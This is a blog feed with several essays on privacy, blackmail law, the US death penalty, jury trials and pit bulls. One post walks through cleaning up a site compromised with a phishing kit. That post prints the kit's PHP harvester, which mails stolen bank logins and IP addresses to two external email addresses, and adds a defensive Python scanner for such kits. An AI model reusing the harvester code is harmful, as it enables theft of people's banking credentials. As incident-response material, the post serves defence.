Chronosynclastic Infundibulum » legal
http://www.semanticoverload.com | The world through my prisms | Feed last built Thu, 07 Apr 2011 17:36:17 +0000

If a tree falls in the forest…
http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/
Thu, 05 Aug 2010 04:42:25 +0000 | Semantic Overload

“If a tree falls in the forest and there is no one to hear it, does it still make a sound?” This, in essence, is the issue of privacy. If a specific action (or piece of information) is observable (even after the fact) by no one but the actor, then that act (or information) is, by definition, private. The actor could be a single individual or a cohort. Now, because we are in the so-called “information age”, ever greater portions of our actions and our information are becoming observable. Unfortunately, very few of us realize this, and so many actions that we thought were private are not, and this is getting a lot of people into hot water. Naturally, there is a backlash, and the resulting turbulence is now presenting itself in all its glory all over the Internet.

Even though there is a lot of noise about privacy issues, there isn’t really anyone with a clear picture of where things are, where they are heading, where they should be heading, and how we as individuals should adapt to these changes. I think the problem is one of methodology. People are trying to solve new-age problems with old-age tools; it’s not going to work. In this post, I attempt to explain the foregoing sentences.

Fatalists and conservatives. Let us take a look at the two major camps on the issue of privacy today. On one side you have the likes of Mark Zuckerberg, David Thomson, and Samy Kamkar, who believe that privacy is dead (the fatalists), and on the other side you have the likes of the Future of Privacy Forum and Bruce Schneier, who believe that maintaining our privacy is only a matter of setting up the right legal/economic framework of incentives and disincentives within the present (and future) context (the conservatives).

Both camps have valid points. Despite all the brouhaha about privacy issues with Facebook, Facebook continues to add users, and existing users continue to treat it as the repository of their social life and social interactions. So maybe privacy really is dead! But the very fact that there is such a backlash reveals a fissure in society: there is a significant faction that jealously guards many of its actions and its information, but finds that it is not able to maintain its privacy because ‘other entities’ (friends, banks, credit card companies, and such) are making them public. And there are still others who simply do not realize that what they think is private really is not. So the question is, what is the state of the art on this issue?

Privacy vs. Security. The first problem you encounter when trying to answer that question is that there is no common understanding of what privacy really is. Often people bleed their concerns about security into the issue of privacy. This muddies the waters to the point where no coherent narrative emerges. While security is and should always be a grave concern, it is an orthogonal issue to privacy. One possible consequence of a loss of privacy is that the security of our property and resources is put in jeopardy, but that is no basis for conflating privacy with security. There should be separate discussions on each issue. They may complement each other, but one should not supplant the other. Remember, a secure life does not guarantee a private life!

Privacy through public obscurity. Now that we know we are talking exclusively about privacy and not security, we can move forward. In the past, privacy was protected largely by technological limitations that made several tasks intractable. Such intractability led to privacy through public obscurity. For example, before the advent of the telegraph and telephone, there was very little to worry about in the way of legitimate information about your activities (that you deem private) reaching your relatives in a different state. Why? Because of what I like to call the Chinese-whispers effect. But that changed with the ubiquity of telephones. Similarly, before the advent of the internet, at any point in your life you were free to ‘reinvent’ yourself by simply moving to a new town, getting a new job, and simply not citing individuals from your old life as references. There was very little anyone could reasonably do to dig up your past life (of course, you could always hire a private eye, but that would constitute an unreasonable effort).

In fact, the privacy of your online communications with your bank rests on the same principle. Worried? Don’t be, not for now at least. ‘Secure’ online connections use public-key cryptography to set up the session (the traffic itself is then encrypted with a symmetric cipher under the key agreed that way), and the most common public-key scheme, RSA, uses as its public key a number whose factors are two secret primes of 100 to 200 digits each. Anyone can encrypt with the public number, but decrypting takes the private key, and no method is known for getting at that which does better than factoring the public number into its two primes. The best known factoring algorithms are a great deal cleverer than brute force, but their running time still grows faster than any polynomial in the length of the number, so at the key sizes in use the task is intractable: even the fastest computers would need far longer than the information stays interesting, by which time the contents of your private communication will be (hopefully) irrelevant. Thus, privacy through public obscurity.

I bring up the example of public-key encryption for a reason: factoring large numbers, although intractable right now, might not be so in the future. It won’t be because computers got faster; it will be because either a large enough quantum computer becomes a reality (Shor’s algorithm factors in polynomial time on one), or the answer to the famous P=NP question in computer science turns out to be yes. If that happens, what do you think society’s response will be? Do you expect two camps: one that says cryptography is dead, and another that says all mechanisms to factor numbers should be outlawed or disincentivised somehow? Of course not. That’s an absurd proposition! The response will be to build a better cryptographic technique, one that rests on a problem that remains hard given the state of the art.

We are facing a similar situation with privacy today, and the two camps that I referred to earlier are not helping. The fact remains that these days, more often than not, someone is hearing a tree fall in the forest, and so more trees are making a sound when they fall. So how do we deal with it?

First, learn to give up some of your privacy. Technology has made a lot of tasks tractable, and our physical and mental faculties are not evolving at a rate that matches the pace of technology. Consequently, we are not able to make all our actions intractable to the new technology. So we have to give up some of our privacy. While this may be a ghastly notion for people in the western hemisphere, it is surprisingly common for societies in the eastern hemisphere to trade privacy for a social support structure, security, and (more controversially) happiness. Much as we have given up privacy for air travel but not for bus or train journeys, we may have to give up privacy in certain aspects of our lives that we had otherwise considered private.

As for the natural follow-up question, which aspects of our privacy we have to give up, I honestly don’t know. My speculations and proposals here are of a methodological nature. I am not answering questions. I am just trying to figure out what the right questions to ask are! Isn’t that the first step in arriving at a resolution of our privacy issues?

Second, indulge in information overload. The less information you give out, the more useful every extra bit of information about you is. Inevitably, despite your best efforts, more information about you will leak out. So how do you counter that? With information overload. Take Hasan Elahi as a classic example. After he was erroneously put on the FBI terrorist watch list and had to endure gruelling questioning by the FBI that took up hours of his time, ultimately to no one’s benefit, he decided to turn the tables on the FBI. He put up a website called Tracking Transience where he has put up pictures, videos, and all sorts of evidence of where he has been and what he has been doing every hour of every day! Since there is already so much information about him available, any additional information about him is not so useful any more. Curiously, he doesn’t appear in any of these photographs. He is the one behind the camera. So in a sense, although he has given you so much information about himself, he really hasn’t given you anything that is remarkably useful. Paradoxically, by revealing so much about himself online, he has secured his privacy. [For details, visit: http://memes.org/tracking-transience-hasan-elahi]

Ok, so Tracking Transience works for Hasan; what about the rest of us? Again, I am only showing you where to begin asking the right questions; I do not have answers for you.

Are there any more tools of this or a different kind that we can employ? Arguably, yes. One needs to look harder, and look in different places. The new tools are different in kind and, presumably, in an ironic twist, an artefact of the very technology that precipitated the issue of privacy in the first place.

In conclusion, my argument is simply that you cannot use the old tools of fatalism, legal recourse, and economic regulation to frame the debate on privacy and expect a resolution. They are simply the wrong tools for the job! I will wrap this post up by continuing with the metaphor I started with: if the tree falls in the forest and there are people to hear it, then let them hear it, but make sure that every minute sound made by the tree and the trees around it is perpetually amplified and broadcast, to the point where the sound made by the falling tree becomes noise and simply irrelevant!

The Blackmail Paradox
http://www.semanticoverload.com/2010/08/01/the-blackmail-paradox/
Sun, 01 Aug 2010 23:28:32 +0000 | Semantic Overload

While most agree that blackmail — the act of threatening to disclose true, but damaging, (potentially secret) information about a party unless payment is made (to earn silence) — is a criminal act, it poses two interesting paradoxes in the theory of criminal justice.

The paradoxes are as follows:

  • The first paradox is that “two rights make a wrong”; blackmail renders two otherwise perfectly legal actions illegal when performed in conjunction with each other. To use the example (albeit slightly modified) from Blackmail and Extortion – The Paradox Of Blackmail: “For example, if I threaten to expose a businessman’s income-tax evasion unless he gives me [sic] X amount of money, I have committed blackmail. I have a legal right to expose and to threaten to expose the tax evasion, and I have a legal right to request for [sic] X amount of money, but if I combine these rights I have committed blackmail. If both ends and means are otherwise legal, why is it blackmail to combine these legal ends and means?”
  • The second paradox, persisting with the example above, is this: while it is considered blackmail for me to threaten to expose a businessman’s income-tax evasion unless he gives me X amount of money, it is perfectly legitimate for the businessman to voluntarily give me X amount of money (despite my not asking for it, and not even suggesting that I have knowledge and proof of the tax evasion) so that I do not expose his income-tax evasion; that does not constitute blackmail.

These two paradoxes have been a thorn in the side of jurisprudence for many decades and are yet to be resolved to everyone’s satisfaction. In fact, they have inspired a significant minority of scholars and libertarians to advocate decriminalizing blackmail! Seeing that Wikipedia does not have an article on this issue (yeah, it surprised me too!), I decided to write something up in lieu of it. Let’s take a closer look at each paradox.

Paradox 1: Two rights make a wrong

The crux of the issue is the following. If the threat to commit an act (like murder) is dangerous enough to be criminalized, then the act itself must be more dangerous, and therefore a crime. However, if an act in itself is not dangerous enough to be criminalized, then it makes little sense to criminalize the threat to commit that act. Paradoxically, blackmail is criminalized despite the fact that it constitutes a threat to commit an act that is otherwise perfectly legal!

The many justifications for criminalizing blackmail include: it is immoral; it encourages disclosure of incriminating evidence, thus deterring crime; it helps minimize the “victims” from resorting to “self help”, like killing or harming the blackmailer, or even suicide; and so on. Unfortunately, none of these arguments really resolve the paradox. They merely explain how criminalizing blackmail is a good thing, but don’t really explain the nature of blackmail itself and why it should be an exception (and hence trigger the paradox).

It is easy to see why blackmail involving incriminating evidence is criminalized. First, if the blackmailer is withholding the evidence, and worse, profiting from it, then he/she has failed in their moral and civic duty. Second, withholding such information obstructs justice. Third, profiting from something that presents a danger to public safety is morally reprehensible. But what about blackmail involving embarrassing information that has been obtained lawfully and that the blackmailer is within his/her legal rights to disclose to the public?

Here, it is helpful to examine the relationship between the parties to see how blackmail is different from all other legal threats. Again, to quote from Blackmail and Extortion – The Paradox Of Blackmail:

Consider first informational blackmail. Here the blackmailer threatens to tell others damaging information about the blackmail victim unless the victim heeds the blackmailer’s request, usually a request for money. The blackmailer obtains what he wants by using extra leverage. But that leverage belongs more to a third person than to the blackmailer. The blackmail victim pays the blackmailer to avoid involving third parties; he pays to avoid being harmed by persons other than the blackmailer. … In effect, the blackmailer attempts to gain an advantage in return for suppressing someone else’s actual or potential interest. The blackmailer is negotiating for his own gain with someone else’s leverage or bargaining chips.

Ken Levy from Harvard Law School offers the following arguments in [39 Conn. L. Rev. 1051] to resolve the paradox (while maintaining blackmail as a criminal activity):

Levy argues that while the correlation between the legality of an action and the legality of threatening that action is strong, it is by no means a causal relationship. That is, there is no reason to believe that a legal threatened action entails a legal threat. Consequently, the paradox is an artefact of our bias and not of the law itself. But that still does not explain why blackmail should be illegal.

Levy goes on to argue that the rights to life, physical well-being, emotional well-being, family, liberty, and property constitute what are called “legally protected” interests, and it is in the interest of the people and of society that criminal law protect people against any harm inflicted on these interests. This is why acts like homicide, kidnapping, rape, assault, and harassment (among many others), and even threats to commit such acts, are deemed criminal. So where does that leave blackmail? Blackmail threatens a person’s reputation, and reputation is not a legally protected interest (although we are protected against disclosure of untrue, reputation-damaging information). In fact, the right to reputation and the right to free speech are often in conflict, and we as a society happen to value the latter more highly. Consequently, the right to free speech is legally protected, but the right to reputation is not. So, isn’t that an argument for decriminalizing blackmail?

To this, Levy argues that although the right to reputation has been trumped by the right to free speech within the set of legally protected interests, the former nevertheless embodies the “spirit” of legally protected interests, and individuals do treat reputation as an enshrined right; in fact, this is precisely why blackmail succeeds! Therefore, in all cases where the right to reputation does not compete with or impinge upon the right to free speech, any threat to reputation should be considered on a par with threats to other legally protected interests. Hence, blackmail should be criminalized even though its constituent actions in isolation remain legal. This, Levy argues, resolves the first paradox. Levy concludes: “… well as a novel positive justification for criminalizing blackmail threats. Once again, blackmail threats should be criminal for the same reason that menacing, harassment, and stalking are: they involve the reasonable likelihood, not to mention intent, of putting the target into a state of especially great fear and anxiety. And we as a society have decided that, like life, physical well-being, family, liberty, and property, emotional well-being is a supremely valued interest and therefore should be protected from deliberately inflicted injury when no competing moral or institutional interests, such as freedom of speech, would themselves be compromised.”

Paradox 2: Blackmailer-initiated vs. blackmailee-initiated

Here, if A offers to conceal B’s embarrassing, but true, information in exchange for money, then A is committing a crime (blackmail). But if B voluntarily offers money to A in exchange for A’s secrecy, it is a legitimate transaction. What is the difference between the two transactions that makes the first one a crime and not the second one?

Interestingly, libertarian philosophy sees no distinction between the two transactions, because both take place between consenting adults and are the same transaction except for the party that initiates it. Libertarians often cite the legitimacy of the second type of transaction to argue for the legalization of blackmail. At the other end of the spectrum, Marxists also see no difference between the two transactions, and often cite the illegitimacy of the first type to argue for criminalizing blackmailee-initiated transactions. The Liberal, on the other hand, has the hardest task of all: to argue for criminalizing the first transaction while simultaneously making a compelling case for keeping the second legal.

Kathryn H. Christopher argues the Liberal case in her paper “Toward a Resolution of Blackmail’s Second Paradox”, Arizona State Law Journal, 37(4), 1127–1152, 2005. Christopher provides the following example:

Acceptance of money, pursuant to an unsolicited offer, not to commit a criminal act is lawful. For example, suppose that Lilli (a robberee), who is very rich and extremely averse to being robbed or threatened with harm, offers everyone she meets $1000 if they agree not to rob her. The recipients of Lilli’s offer neither insinuated they would rob her nor had any intention of robbing her—Lilli’s offer is entirely unsolicited. The recipients even inform Lilli of their lack of inclination to rob her. But Lilli is not to be denied, reiterates the offer, and the recipients finally accept. Have the recipients committed a crime by accepting Lilli’s money? Presumably not. They neither (impliedly or expressly) threatened Lilli, nor defrauded her, nor accepted money under false pretences. Thus, the recipients commit no crime by accepting Lilli’s money in return for agreeing not to rob her or threaten her with harm.

If accepting money, pursuant to an entirely unsolicited offer, not to commit a criminal act against the offeror is not a crime, then a fortiori accepting money (under the same circumstances) not to commit a lawful act must also not be a crime. If only one of the two were to be criminalized, it would be accepting money not to commit a criminal act. …one has the right to commit lawful acts. Thus, one should also have the right to accept money for foregoing the right to do that which one has a right to do.

Consequently, it should be legal for B to offer money to A so that A exercises A’s right to keep some (non-incriminating, but embarrassing) information about B secret.

Christopher then strengthens her argument with another example. Suppose the blackmailee-initiated transaction were also criminalized; then:

Case 1: Suppose that Blackmailer utters the following conventional blackmail threat to Blackmailee: “If you do not pay me $2000, then I will reveal your embarrassing secret.” Blackmailer accepts the $2000 payment from Blackmailee.
Outcome: Blackmailer is criminally liable for one count of blackmail.
Case 2: Suppose that Blackmailee 2 makes an unsolicited offer to pay $500 to Blackmailer 2 in return for Blackmailer 2 concealing Blackmailee 2’s secret. Blackmailer 2 rejects the offer. Blackmailer 2 counteroffers by uttering the conventional blackmail proposal (the same proposal as uttered by Blackmailer 1 above). Blackmailee 2 rejects the proposal and counteroffers $1000. Blackmailer 2 accepts these terms. Blackmailee 2 pays the money to Blackmailer 2 who accepts the payment.
Outcome: Blackmailer 2 is criminally liable for two counts of blackmail (or one count of blackmail and one count of the new crime of accepting money pursuant to a blackmailee’s offer of money).

Despite Blackmailer 2 obtaining one-half of the money that Blackmailer obtained, Blackmailer 2 is, in a sense, twice as criminally liable as Blackmailer. Both Blackmailer and Blackmailer 2 commit the traditional offense of blackmail by uttering the threat. But unlike Blackmailer, Blackmailer 2 also commits a second count of blackmail …

This is just plain absurd! Therefore, Christopher argues, blackmailee-initiated transactions should remain legitimate, thus resolving the second paradox.

Disclaimer: This post merely summarizes other individuals’ research and is not the author’s original intellectual property. All sources have been cited where appropriate. If there has been a misappropriation or a failure to cite some sources, I apologize and assure you that it was completely accidental. If you do notice something of this nature, please contact me and I will remedy the issue.

US Death Penalty Sans An Intellectual Argument
http://www.semanticoverload.com/2010/01/08/us-death-penalty-sans-an-intellectual-argument/
Sat, 09 Jan 2010 04:54:39 +0000 | Semantic Overload

On October 23rd, 2009, the American Law Institute (ALI) resolved to withdraw Section 210.6 of the Model Penal Code (MPC). The official copy of the resolution (proposed on April 15, 2009) is available in PDF form. Why is this important? Simply because peeling back the obfuscating legalese reveals that this resolution has effectively demolished the intellectual underpinnings of the argument for, and the practice of, the death penalty in the US.

The resolution essentially says that the US justice system is too irreparably broken to admit a fair and just death penalty. In its own words:

.. more fundamentally Section 210.6 is simply inadequate to address the endemic flaws of the current system. Section 210.6, which in many respects provided the template for contemporary state capital schemes, represents a failed attempt to rationalize the administration of the death penalty and, for the reasons we discuss in greater detail below, its adoption rested on the false assumption that carefully-worded guidance to capital sentencers would meaningfully limit arbitrariness and discrimination in the administration of the American death penalty.

It lays out six important reasons for such disrepair [sourced from the actual text of the resolution (in PDF)]:

  1. Section 210.6 calls for an individualized determination of whether a particular crime (specifically murder, under certain circumstances) warrants the death penalty as the appropriate sentence. However, several states have statutory lists of which murders command the death penalty, and such statutory enumeration leaves the jury with a ‘formula’ for awarding the death sentence rather than an individualized determination.
  2. Furthermore, the wide range of murders/crimes that are currently eligible for the death sentence under various state laws is antithetical to the “spirit” and gravity of the punishment. The problem is that no state has successfully confined the death penalty to a narrow band of the most aggravated cases. Death eligibility in prevailing statutes remains breathtakingly broad, as aggravating factors or their functional equivalent often cover the spectrum of many if not most murders.
  3. There is an almost unforgivable racial bias in the proportion of minorities among those sentenced to death. Persistent efforts by various groups to address this issue have yielded little in the way of a legal remedy.
  4. The cost of administering the death-penalty is extremely high, and combined with the ineptitude of the defendants’ legal representation, the state incurs high costs in putting people to death who, arguably, do not deserve the punishment in the first place. The resolution noted: “Despite the fact that “effective assistance of counsel” is a recognized constitutional right, the scope of the right and the nature of the remedy have precluded the courts from being able to ensure the adequacy of representation in capital cases.”
  5. In light of DNA evidence and newer forensic technologies, there is an unacceptable risk that some persons sentenced to death will later, and perhaps too late, be shown not to have committed the crime for which they were sentenced. This issue is highlighted in House v. Bell, in which the petitioner sought federal review with substantial new evidence challenging the accuracy of his murder conviction, including DNA evidence conclusively establishing that semen recovered from the victim’s body actually came from the victim’s husband, as well as evidence of a confession to the murder by the husband; the Tennessee Supreme Court had refused to consider whether new DNA evidence presented during death penalty appeals necessitates a new trial, and declined to answer other questions posed.
  6. The politicization of judicial and gubernatorial elections has made the death penalty a campaign issue, which leads to populist-style administration of the death penalty. Additionally, the politicization of capital punishment in the legislative sphere limits the capacity of legislatures to promote and maintain statutory reform. The kind of statutory reform that many regard as the most promising for ameliorating arbitrariness and discrimination in the application of the death penalty is a strict narrowing of the category of those eligible for capital punishment.

In light of these observations, the resolution concludes: “these conditions strongly suggest that the Institute recognize that the preconditions for an adequately administered regime of capital punishment do not currently exist and cannot reasonably be expected to be achieved.”

If your site has been compromised with phishing attack code…
http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/
Tue, 17 Mar 2009 07:30:42 +0000 | Semantic Overload

I recently received the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I learned that my site had been compromised by hackers and that phishing code had been injected into it. If it happens to you, do you know the right thing to do? How do you fix it? Here is what I did; I think it is worth sharing in case it is useful to others. So here goes.

Step 1. Disable Your Site

First, disable your site: bring it down temporarily. The last thing you want is for more people to be scammed through a site you own. You can do that by removing all access to all the files within the website. On unix/linux, “chmod -R 000 <website-home-directory>” does it (refer to a chmod tutorial if you are unfamiliar with it); mode 000 denies everyone except root, so it also stops PHP that runs as your own user under suEXEC or cPanel. For those using cPanel, go to the file manager and change the permissions of the document root. Two things to do before you run that command: take a copy of the whole site (a tarball keeps the timestamps) so that you have an untouched record of what the attacker left behind, and record the current permissions of every file and directory, because you will need them to bring the site back in Step 5 and a recursive chmod erases them.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by the phishing attack, we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Phishing means stealing your username and password by impersonating a credible website that you log into with those credentials. In HTML this is typically accomplished through forms, which begin with a <form> tag, so I dug through the code and found two form tags.

The first one was:

<form method="get" action="http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?" name="searchForm" onsubmit="return verifyQuery(this.searchString);">

…..

This one looks fine: its ‘action’ attribute points to http://search.wachovia.com/selfservice…, a search script on the real Wachovia website, so anyone filling out this form is sending their data to Wachovia and the hacker gets nothing from it. It is there only to make the copy look authentic.

Now to the second form tag:

<form method="post" action="screen.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return submitLogin(this)">

……

Aha! The smoking gun! Why? Look at the ‘action’ attribute of this form: ‘screen.php’ is a relative URL, so the browser resolves it against the page it is on, and the login form posts to a script in the same directory on my server, not to anything on the Wachovia servers. So the hackers had installed a second script on my system to collect the usernames and passwords. Next I went to see what was inside this ‘screen.php’, which sits in the same directory as the ‘confirm.html’ we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = "Hello
userid : $userid
password : $password
-----------0WN3d By Louis----------------
IP : $ip
DATE : $datamasii
";

$recipient = "cashbug5010@gmail.com,smithgreen@hotmail.com";
$subject = "Take What U need But Make Sure U Cash It Out !!!";

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header("Location: http://www.wachovia.com/helpcenter/0,,,00.html");
?>

So here we are! Gotcha! Check out the line ‘$recipient = "cashbug5010@gmail.com,smithgreen@hotmail.com";’. Clearly, the stolen credentials were being mailed to the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities, who can carry the investigation forward. And who are they? First, reply to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s on the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org on this email and give them a copy of the phishing code (in this case it was the file ‘screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by setting their permissions to ‘000’). Now that the code has been quarantined, you can bring your website up again by setting the permissions back to what they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care of and your site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and that none of your directories are writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game between hackers and the likes of you, each getting smarter and better than the other.
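The checks in Steps 2 and 3 can be scripted. This is an added example, not code from the original post: it walks a web root, parses each HTML file for forms that post to a relative (local) action and collect a password (the password-field condition is my narrowing of the post's "local action" test, so ordinary search forms are not flagged), and flags PHP files that call mail() with hard-coded recipients. The kit it scans is constructed inline with placeholder addresses.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Constructed sample kit modelled on the confirm.html / screen.php pair above;
# the drop addresses are placeholders, not the ones reported on the page.
SAMPLE_HTML = """<html><head><title>Example Bank - Sign On</title></head><body>
<form method="get" action="http://search.example-bank.test/search.do"><input name="q"></form>
<form method="post" action="screen.php"><input name="userid"><input type="password" name="password"></form></body></html>"""
SAMPLE_PHP = """<?php $mesaj = "userid : " . $_POST["userid"] . " pw : " . $_POST["password"];
mail("DROP-ADDRESS-1@example.test,DROP-ADDRESS-2@example.test", "stolen", $mesaj); ?>"""

class FormScanner(HTMLParser):
    """Record every <form> action and whether that form collects a password."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur and (a.get("type") or "").lower() == "password":
            self._cur["password"] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def is_local_action(action):
    """A relative action (no scheme or host) posts to a script on this server."""
    return not re.match(r"^(https?:)?//", action.strip(), re.I)

def scan_file(path):
    """Return (path, kind, detail) findings for one HTML or PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    out = []
    if path.lower().endswith((".html", ".htm")):
        p = FormScanner(); p.feed(text)
        for f in p.forms:  # Step 2 check: a credential form posting to a local script
            if f["password"] and is_local_action(f["action"]):
                out.append((path, "local-credential-form", f["action"]))
    elif path.lower().endswith(".php") and re.search(r"\bmail\s*\(", text):
        out.append((path, "mail-call", sorted(set(EMAIL_RE.findall(text)))))  # Step 3: drop addresses
    return out

def scan_tree(root):
    """Walk the web root and collect every finding (Steps 2 and 3 of the post)."""
    out = []
    for d, _, files in os.walk(root):
        for name in sorted(files):
            out.extend(scan_file(os.path.join(d, name)))
    return out

def build_sample_tree():
    """Write the constructed kit into a temporary web root and return its path."""
    root = tempfile.mkdtemp()
    kit = os.path.join(root, "plugins", "editors-xtd")
    os.makedirs(kit)
    for name, body in (("confirm.html", SAMPLE_HTML), ("screen.php", SAMPLE_PHP)):
        with open(os.path.join(kit, name), "w") as fh: fh.write(body)
    return root
```

Run scan_tree() against the document root; the findings give the file paths to quarantine (Step 5) and the drop addresses to report (Step 4).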

Trial by Jury – A Flawed Model
http://www.semanticoverload.com/2007/11/13/trial-by-jury-a-flawed-model/
Tue, 13 Nov 2007 06:29:39 +0000, Semantic Overload

Trial by jury is a popular concept in the justice system. I haven’t yet understood how it is better than having a trained professional weigh evidence and award the judgment. I see it as a system that is prone to fault, and worse, fault undetectably!

When stripped down to essentials, the Jury is a collection of ‘average’, ‘everyday’ people who decide on a court case based on the evidence presented to them. The basic idea being, if 9 (or whatever number of) common folk think you are guilty, then you probably are. And if they think you deserve to spend x number of years in jail for it, then you probably do.

The Jury is supposed to deliver Justice. But what is justice? According to Plato “Justice is the interest of the stronger”, but Criminal Justice, on the other hand, can be stated as “a system of legislation, practices, and organizations, used by the state to maintain social control, deter and control crime” (paraphrased from wikipedia). The jury, in the present context is expected to deliver Criminal Justice. Now the question is, does it?

Objectivity (or lack thereof)

Criminal Justice operates upon a set of Laws. If any individual or organization violates the law, a crime is said to have been committed. One of the duties of the Jury is to determine if the law has indeed been broken. This process involves interpreting the law (often done by the lawyers for the jury) and determining whether or not the law was indeed broken. Such interpretation should, ideally, be an objective exercise. This is necessary to ensure ‘fairness’.

Let me digress for a few sentences. How does one determine the validity of an argument in a scientific effort? Typically through peer review among subject matter experts. Why? Because they know the subject best, and are the best judges of whether an argument is valid or not.

In other words, a person who is an expert in a particular area is a good judge of arguments in that area. Why should law be any different? Why is it assumed that an argument about the law is somehow best judged by a group of laypeople?

The consequence of this is a loss of objectivity and fairness in the system. People are too easily swayed by emotions; they are prejudiced by their own views, opinions, and value system. It takes an expert (like a judge trained in law) to divorce all this from the case at hand and be able to weigh the evidence and arguments. A jury of laypeople is nowhere near as qualified or skilled.

Awarding a Sentence

Often, the jury is also asked to determine the sentence (in terms of prison time, or financial payments) in many cases. This is an exercise that the jury is hopelessly ill-equipped for.

The prison system is often referred to as a ‘correctional system’. This is so because functionally, a prison is meant to serve as a place where the criminal does ‘penance’ for his/her crime and at the end of the term comes out as a ‘reformed’ person. So when a person is being sent to prison for x number of years, it has been determined that it will take the correctional facility x number of years to reform the person into a productive member of the society.

So my question is: by what (justifiable) qualification does the jury possess the authority to determine the time necessary for a criminal to be ‘corrected’ or ‘reformed’? The jury is regular people like you and me. If someone were to ask me how long it takes for (say) a street thug to be reformed, my honest answer would be “I don’t know”. Then how can a jury, who have no knowledge or training in this matter, possibly know the time it takes for such a reform? And then how can they determine the right magnitude of sentence?

Restorative Justice vs. Retributive Justice

Most criminal justice systems in the world are based on restorative justice. Restorative justice focuses on establishing social harmony and mutual responsibility. So when determining whether or not a crime has been committed, and if so, what the magnitude of the sentence should be, it is important that social harmony be established by the justice system in that process. There have been many cases where social harmony has been a major motivation for certain decisions by courts, e.g. Brown vs. Board of Education, Gay Student Services vs. Texas A&M University, etc.

Such exercises in restorative justice, however, require an excellent and thorough understanding of factors at the regional as well as the global level. This holds even for local cases, because any case can become a precedent for future cases. The individual engaging in restorative justice must be aware of the implications that his/her decision will have on the landscape of law and justice in general.

Often, a jury-based justice system is only as smart as the jury (who are often average-joe kind of people), and hence not in any way enabled to engage in restorative justice. In the absence of specialized training, the jury has no choice but to resort to a more primitive form of justice: retributive justice, which essentially says that the punishment must fit the crime. An easy, but flawed, yardstick to go by. Such retributive justice can result in a denial of justice and, worse, become a precedent for future cases to follow, thus propagating this denial to future parties.

All of the above deficiencies can be remedied by moving away from a jury-based trial to a trial by judge (under the assumption that the judge is a trained subject matter expert in law). Based on the above arguments, it is hard not to conclude that the jury system is a model that is designed to fault undetectably. The undetectability of its faulting provides a false sense of confidence in the system. It is best done away with.

Legalities with Pit Bull
http://www.semanticoverload.com/2007/10/31/legalities-with-pit-bull/
Wed, 31 Oct 2007 22:07:47 +0000, Semantic Overload

At my local community radio station, a pit bull puppy was found, presumably lost. There was some discussion about what should be done with it: should it be handed over to an animal shelter? During the discussion, one of the volunteers had this to say about it:

Calling animal control for a Pit Bull in this county is a death sentence for the dog. They check for a chip, and if they don’t find one they immediately kill the dog. The breed is considered dangerous and a nuisance by ordinance and they will not adopt one out.

Having been through rescuing a Pit Bull myself I have to tell you that finding a home for one and keeping it out of the hands of the dog fight people is tough. I had one that I rescued from the house behind Early Bird boarded for close to seven months while I interviewed potential adopters, rejecting all of them that didn’t reject the dog because they either didn’t check out or immediately began patting the dog down and commenting on “really nice muscle tone” and how “well developed” they were as they drooled. I terminated interviews on the spot with close to half a dozen when it became clear what they wanted the dog for.

The sad fact of the matter is that Pit Bulls are a menace, not because they’re bad dogs but because they’re a “macho dog” that macho people get because they want to walk the macho dog and show off to everyone that they can handle a Pit. The problem is that they lose interest in the dog that they really didn’t want to begin with (they’re meant to be a prop, not a pet) and start letting the dog walk itself. The result is that either the dog gets killed by a car or truck on the road, by Animal Control if they’re picked up, or worst case they kill a human when they join up with a pack of other dogs and instinct takes over.

And the Pit Bull puppy mills continue to crank them out because there’s a market for them. For every macho person that loses interest there are two or three more that decide to express themselves by getting a Pit.

